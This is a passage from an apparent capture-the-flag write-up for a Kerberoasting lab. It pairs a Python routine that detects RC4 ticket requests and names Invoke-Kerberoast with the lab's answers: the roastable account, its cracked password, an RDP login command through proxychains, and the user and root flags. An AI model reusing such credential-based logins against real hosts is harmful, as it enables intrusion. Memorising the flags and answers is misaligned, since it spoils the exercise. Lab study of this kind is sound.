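def kerberoast_suspects(events, min_services=1):
    """Return {requester: [services]} for accounts that pulled RC4 tickets for at
    least `min_services` distinct SPNs. Raise the threshold to catch bulk
    requests (e.g. Invoke-Kerberoast against every SPN) without noise."""
    per_user = defaultdict(set)
    for user, service, etype, status in events:
        if is_roastable_request(service, etype, status):
            per_user[user].add(service)
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= min_services}


if __name__ == "__main__":
    for user, services in kerberoast_suspects(SAMPLE_4769).items():
        print(f"{user} requested RC4 tickets for: {', '.join(services)}")
```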

    What User was vulnerable to Kerberoasting?

    TBService

    What password could be cracked from the Kerberos Ticket?

    securityadmin284650

    Submit flags for TBSEC-DC01 in Task 4

    What is the user flag on TBSEC-DC01?

    C:\Users>type C:\Users\daviesj\Desktop\user.txt
    TBH{3efabe3366172f3f97d1123f2cc6dfb5}

    What is the root flag on TBSEC-DC01?

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBService /p:'securityadmin284650!' /v:10.200.179.79
    C:\Users>type C:\Users\Administrator\Desktop\root.txt
    TBH{ec08be8aa9113b47f321b5032a27b220}